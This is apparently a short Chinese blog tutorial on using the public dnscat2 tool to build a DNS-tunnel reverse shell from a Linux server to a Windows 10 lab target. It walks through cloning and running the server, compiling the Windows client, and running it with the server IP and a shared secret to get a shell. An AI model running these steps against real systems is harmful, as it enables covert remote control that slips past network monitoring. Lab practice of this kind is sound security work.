使用dnscat2 进行dns隧道反弹shell——直连模式linux对windows

安鸾彭于晏2024-07-18 22:39
  • 直连模式:客户端直接向指定IP地址的DNS服务器发起DNS解析请求

环境搭建

搭建服务端

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

gem install bundler

apt-get install ruby-dev

bundle install

过程会有点慢

开启服务端

ruby ./dnscat2.rb

搭建客户端

这里首先需要在Visual Studio 2008中打开一个解决方案:client\win32\dnscat2.vcproj。然后编译就会看到client\win32\Release下有一个dnscat2.exe文件了

将这个文件上传至win10靶机运行

开启客户端

dnscat2.exe --dns server=192.168.227.128,port=53 --secret=9d42a40bfeef7cf1f781326684d4d3e0

剩下的就和linux一样,进入隧道反弹shell,然后ctrl+z返回上一层

进入弹回来的shell

相关推荐
桌面运维家5 小时前
vDisk VOI桌面安全策略怎么配置?详细教程
运维·网络
专注VB编程开发20年5 小时前
如何强制ANY CPU的.net程序按32位或64位模式运行?
windows·.net
重生之绝世牛码5 小时前
Linux软件安装 —— ClickHouse单节点安装(rpm安装、tar安装两种安装方式)
大数据·linux·运维·数据库·clickhouse·软件安装·clickhouse单节点
莫问前路漫漫6 小时前
Electerm 连接远程服务器完整指南
运维·服务器·git
苏宸啊6 小时前
Linux下diy程序:进度条
linux·运维·服务器
70asunflower6 小时前
Python with 语句与上下文管理完全教程
linux·服务器·python
j_xxx404_6 小时前
Linux:调试器-gdb/cgdb使用
linux·运维·服务器
艳阳天_.6 小时前
华为云欧拉服务器问题记录
运维·服务器·华为云
驱动探索者6 小时前
AMD EPYC 服务器 CPU 学习
运维·服务器·学习·cpu
市安6 小时前
docker命令知识点1
运维·docker·云原生·容器·eureka
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Claude Code Skills 实用使用手册04Open Code教程(四)| 高级配置与集成05UV安装并设置国内源06Linux下V2Ray安装配置指南07在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)08Antigravity AI编程工具添加和使用Skill完整教程09AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南10Labelme从安装到标注:零基础完整指南